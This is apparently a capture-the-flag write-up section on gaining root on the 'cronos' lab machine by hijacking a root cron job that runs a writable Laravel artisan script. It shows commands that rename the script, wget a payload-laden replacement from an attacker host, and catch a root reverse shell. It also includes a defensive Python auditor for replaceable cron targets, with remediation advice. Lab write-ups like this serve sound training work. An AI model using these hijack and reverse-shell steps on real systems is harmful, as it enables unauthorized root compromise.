Hijacking


I discovered a system-level cron job that executes a PHP script every minute. The current user has complete control over the script.

www-data@cronos:/var/www/laravel$ mv artisan artisan.bak

I will first rename the script

www-data@cronos:/var/www/laravel$ wget http://10.10.14.5:8000/artisan ; chmod 777 artisan
--2023-01-16 20:49:52--  http://10.10.14.5:8000/artisan
Connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1502 (1.5K) [application/octet-stream]
Saving to: 'artisan'
 
artisan             100%[===================>]   1.47K  --.-KB/s    in 0s      
 
2023-01-16 20:49:52 (179 MB/s) - 'artisan' saved [1502/1502]

Deliver the payload-embedded replacement and change the permission bits
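The misconfiguration exploited above (a root cron job whose target file and directory are writable by www-data) is straightforward to audit for. The following is an added example, not code from the original writeup: it parses system-crontab text, extracts the script each entry runs, and reports entries whose target is group/world-writable, owned by a non-root user while running as root, or sitting in a writable directory without the sticky bit (the condition that allows the rename-and-replace shown above). The sample crontab line in the demo is constructed; only the path /var/www/laravel/artisan comes from this writeup.

```python
"""Audit /etc/crontab-style entries for targets a lower-privileged user could
replace. Added, illustrative check (not code from the original writeup); the
sample crontab text in the demo below is constructed."""
import os
import re
import shlex
import stat

# Interpreter names that usually precede the real script path on a cron line.
INTERPRETERS = {"php", "python", "python3", "perl", "ruby", "bash", "sh", "node"}
# Tokens after which nothing is the script any more (redirections, pipes, chaining).
STOP_TOKENS = {">", ">>", "2>&1", "|", "&&", "||", ";"}


def parse_system_crontab(text):
    """Return (user, command) pairs from system-crontab text.

    System crontabs (/etc/crontab, /etc/cron.d/*) carry a user field after the
    five time fields or after a single @special field. Comments, blank lines
    and VAR=value assignments are skipped.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        if line.startswith("@"):
            fields = line.split(None, 2)          # @daily user command
            if len(fields) == 3:
                entries.append((fields[1], fields[2]))
        else:
            fields = line.split(None, 6)          # m h dom mon dow user command
            if len(fields) == 7:
                entries.append((fields[5], fields[6]))
    return entries


def script_path(command):
    """Pick the first absolute path in a command that is not the interpreter.

    'php /var/www/app/artisan schedule:run >> /dev/null 2>&1' -> '/var/www/app/artisan'
    """
    try:
        tokens = shlex.split(command)
    except ValueError:                            # unbalanced quotes: crude fallback
        tokens = command.split()
    for tok in tokens:
        if tok in STOP_TOKENS:
            break
        if tok.startswith("/") and os.path.basename(tok) not in INTERPRETERS:
            return tok
    return None


def replaceable_reasons(path, cron_user):
    """Explain why someone other than cron_user could change what `path` runs."""
    reasons = []
    parent_dir = os.path.dirname(path) or "/"
    group_or_world_write = stat.S_IWGRP | stat.S_IWOTH
    try:
        st = os.stat(path)
    except FileNotFoundError:
        st = None
        reasons.append("target missing: a creatable path is a hijack point if its directory is writable")
    if st is not None:
        if st.st_mode & group_or_world_write:
            reasons.append(f"file mode {stat.S_IMODE(st.st_mode):04o}: writable by group/others")
        if cron_user == "root" and st.st_uid != 0:
            reasons.append(f"file owned by uid {st.st_uid}, not root, but runs as root")
    try:
        pst = os.stat(parent_dir)
    except FileNotFoundError:
        return reasons
    # A group/world-writable directory without the sticky bit lets any writer
    # rename the script away and drop a replacement (the rename-and-replace
    # approach this writeup demonstrates), even if the file itself is 0755.
    if pst.st_mode & group_or_world_write and not pst.st_mode & stat.S_ISVTX:
        reasons.append(f"directory {parent_dir} mode {stat.S_IMODE(pst.st_mode):04o}: "
                       "entries can be renamed/replaced by group/others")
    return reasons


def audit_crontab(text):
    """Return one finding per cron entry whose target could be swapped out."""
    findings = []
    for user, command in parse_system_crontab(text):
        path = script_path(command)
        if path is None:
            continue
        reasons = replaceable_reasons(path, user)
        if reasons:
            findings.append({"user": user, "path": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    # Constructed sample line: a root job running the application's artisan script.
    SAMPLE = "* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1\n"
    for finding in audit_crontab(SAMPLE):
        print(f"{finding['user']} -> {finding['path']}")
        for reason in finding["reasons"]:
            print("   ", reason)
```

Run it against /etc/crontab and each file in /etc/cron.d/ (per-user crontabs under /var/spool/cron have no user field and need a different parser). Remediation for a finding is to make the script and its directory root-owned and writable only by root, because the job runs as the cron user regardless of who owns the file.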

┌──(kali㉿kali)-[~/archive/htb/labs/cronos]
└─$ nnc 1234                                                         
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.13] 60726
whoami
root
hostname
cronos
ifconfig
ens160    Link encap:Ethernet  HWaddr 00:50:56:b9:a9:90  
          inet addr:10.10.10.13  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:a990/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:a990/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2857420 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2849592 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:535338995 (535.3 MB)  TX bytes:1378915482 (1.3 GB)
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:2086 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2086 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:202065 (202.0 KB)  TX bytes:202065 (202.0 KB)

System Level Compromise